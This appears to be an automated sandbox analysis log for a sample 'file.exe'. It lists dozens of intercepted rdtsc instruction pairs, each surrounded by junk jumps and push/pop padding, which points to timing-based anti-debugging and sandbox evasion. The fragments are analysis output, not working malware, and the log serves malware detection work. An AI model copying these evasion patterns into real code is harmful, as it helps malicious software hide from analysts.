Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F8019F second address: 4F801BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F801F9 second address: 4F801FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F801FD second address: 4F80201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80201 second address: 4F80207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80207 second address: 4F80232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C43Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDD5537C445h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80232 second address: 4F80242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD5513FC1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80242 second address: 4F80246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA07C9 second address: 4FA07CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA07CF second address: 4FA07D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA07D3 second address: 4FA0823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FDD5513FC26h 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007FDD5513FC21h 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov eax, 0F623315h 0x00000022 mov bh, cl 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0823 second address: 4FA085F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C43Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FDD5537C440h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FDD5537C447h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA06EF second address: 4FA06F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA06F3 second address: 4FA06F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA06F9 second address: 4FA070E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA070E second address: 4FA0712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0712 second address: 4FA0718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0718 second address: 4FA075B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C444h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FDD5537C43Bh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FDD5537C446h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA075B second address: 4FA075F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA075F second address: 4FA077C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA077C second address: 4FA0784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0784 second address: 4FA0799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDD5537C43Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0799 second address: 4FA079F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA079F second address: 4FA07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0497 second address: 4FA04BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD5513FC26h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA04BB second address: 4FA04C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA04C0 second address: 4FA0512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDD5513FC22h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FDD5513FC1Bh 0x0000000f add cl, FFFFFFEEh 0x00000012 jmp 00007FDD5513FC29h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FDD5513FC1Dh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB042C second address: 4FB0487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDD5537C447h 0x00000009 add eax, 0676232Eh 0x0000000f jmp 00007FDD5537C449h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FDD5537C449h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0487 second address: 4FB048D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB048D second address: 4FB0491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF0416 second address: 4FF0449 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FDD5513FC20h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov cl, bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF0449 second address: 4FF0468 instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e push ebx 0x0000000f push eax 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movzx ecx, di 0x0000001b movsx ebx, si 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF0468 second address: 4FF046E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF046E second address: 4FF0472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FF0472 second address: 4FF04A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDD5513FC1Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC0500 second address: 4FC0521 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C440h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, di 0x00000012 mov si, di 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA06A8 second address: 4FA06B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC0019 second address: 4FC0092 instructions: 0x00000000 rdtsc 0x00000002 mov al, 5Fh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 mov si, 3503h 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FDD5537C444h 0x00000015 sbb ax, 0AC8h 0x0000001a jmp 00007FDD5537C43Bh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FDD5537C448h 0x00000026 or esi, 45678D28h 0x0000002c jmp 00007FDD5537C43Bh 0x00000031 popfd 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FDD5537C445h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE07D4 second address: 4FE08EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDD5513FC22h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FDD5513FC1Bh 0x0000000f xor esi, 4A32F55Eh 0x00000015 jmp 00007FDD5513FC29h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 call 00007FDD5513FC1Ch 0x00000025 pushfd 0x00000026 jmp 00007FDD5513FC22h 0x0000002b and cx, 8088h 0x00000030 jmp 00007FDD5513FC1Bh 0x00000035 popfd 0x00000036 pop esi 0x00000037 jmp 00007FDD5513FC29h 0x0000003c popad 0x0000003d push eax 0x0000003e jmp 00007FDD5513FC21h 0x00000043 xchg eax, ebp 0x00000044 jmp 00007FDD5513FC1Eh 0x00000049 mov ebp, esp 0x0000004b pushad 0x0000004c jmp 00007FDD5513FC1Eh 0x00000051 pushfd 0x00000052 jmp 00007FDD5513FC22h 0x00000057 add ah, FFFFFFA8h 0x0000005a jmp 00007FDD5513FC1Bh 0x0000005f popfd 0x00000060 popad 0x00000061 xchg eax, ecx 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 pushfd 0x00000066 jmp 00007FDD5513FC1Bh 0x0000006b sbb ah, FFFFFFEEh 0x0000006e jmp 00007FDD5513FC29h 0x00000073 popfd 0x00000074 push ecx 0x00000075 pop ebx 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE08EB second address: 4FE0923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FDD5537C442h 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 call 00007FDD5537C443h 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0923 second address: 4FE09A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [778165FCh] 0x0000000e pushad 0x0000000f pushad 0x00000010 call 00007FDD5513FC1Ch 0x00000015 pop esi 0x00000016 jmp 00007FDD5513FC1Bh 0x0000001b popad 0x0000001c mov ebx, ecx 0x0000001e popad 0x0000001f test eax, eax 0x00000021 jmp 00007FDD5513FC22h 0x00000026 je 00007FDDC78F2C08h 0x0000002c jmp 00007FDD5513FC20h 0x00000031 mov ecx, eax 0x00000033 jmp 00007FDD5513FC20h 0x00000038 xor eax, dword ptr [ebp+08h] 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE09A5 second address: 4FE09A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE09A9 second address: 4FE09C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE09C3 second address: 4FE09D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD5537C43Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE09D5 second address: 4FE09EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 1Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDD5513FC1Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE09EC second address: 4FE09F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE09F2 second address: 4FE09F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE09F6 second address: 4FE0A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ror eax, cl 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDD5537C43Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0A0F second address: 4FE0A2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0A2C second address: 4FE0A6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007FDD5537C43Eh 0x0000000f retn 0004h 0x00000012 nop 0x00000013 mov esi, eax 0x00000015 lea eax, dword ptr [ebp-08h] 0x00000018 xor esi, dword ptr [00E62014h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push eax 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 push eax 0x00000025 call 00007FDD5953CDC9h 0x0000002a push FFFFFFFEh 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FDD5537C447h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0A6E second address: 4FE0AD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov dh, CAh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c movzx ecx, bx 0x0000000f mov cx, dx 0x00000012 popad 0x00000013 ret 0x00000014 nop 0x00000015 push eax 0x00000016 call 00007FDD593005D1h 0x0000001b mov edi, edi 0x0000001d pushad 0x0000001e mov edi, 3EB29970h 0x00000023 movsx ebx, cx 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 jmp 00007FDD5513FC20h 0x0000002d push eax 0x0000002e jmp 00007FDD5513FC1Bh 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FDD5513FC1Bh 0x0000003d jmp 00007FDD5513FC23h 0x00000042 popfd 0x00000043 mov eax, 5868B7CFh 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0AD5 second address: 4FE0ADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0ADB second address: 4FE0ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FE0ADF second address: 4FE0AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90031 second address: 4F90037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90037 second address: 4F9005F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ax, bx 0x00000010 mov cl, dh 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9005F second address: 4F90065 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90065 second address: 4F9006B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9006B second address: 4F9006F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9006F second address: 4F90073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90073 second address: 4F90086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, 3864h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90086 second address: 4F9008B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9008B second address: 4F900C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDD5513FC27h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F900C3 second address: 4F900C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F900C9 second address: 4F900CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F900CD second address: 4F900FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FDD5537C43Ch 0x0000000e mov dword ptr [esp], ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FDD5537C447h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F900FE second address: 4F90104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90104 second address: 4F9011C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C43Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9011C second address: 4F90120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90120 second address: 4F90124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90124 second address: 4F9012A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9012A second address: 4F90148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDD5537C448h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90148 second address: 4F9016D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FDD5513FC1Eh 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDD5513FC1Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9016D second address: 4F90173 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90173 second address: 4F90179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90179 second address: 4F9017D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9017D second address: 4F90181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90181 second address: 4F901C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b pushad 0x0000000c jmp 00007FDD5537C442h 0x00000011 pushad 0x00000012 mov esi, 6FAA4B17h 0x00000017 call 00007FDD5537C43Ch 0x0000001c pop ecx 0x0000001d popad 0x0000001e popad 0x0000001f push esp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FDD5537C43Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F901C4 second address: 4F90200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 call 00007FDD5513FC23h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], esi 0x00000011 jmp 00007FDD5513FC1Fh 0x00000016 mov esi, dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov bx, 4106h 0x00000020 movsx edx, ax 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90200 second address: 4F902EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FDD5537C43Bh 0x0000000b adc si, 478Eh 0x00000010 jmp 00007FDD5537C449h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, edi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FDD5537C43Ch 0x00000021 add cx, 6A08h 0x00000026 jmp 00007FDD5537C43Bh 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007FDD5537C448h 0x00000032 or ax, 8C68h 0x00000037 jmp 00007FDD5537C43Bh 0x0000003c popfd 0x0000003d popad 0x0000003e push eax 0x0000003f pushad 0x00000040 jmp 00007FDD5537C43Fh 0x00000045 pushfd 0x00000046 jmp 00007FDD5537C448h 0x0000004b sbb al, FFFFFFF8h 0x0000004e jmp 00007FDD5537C43Bh 0x00000053 popfd 0x00000054 popad 0x00000055 xchg eax, edi 0x00000056 jmp 00007FDD5537C446h 0x0000005b test esi, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FDD5537C447h 0x00000064 rdtsc
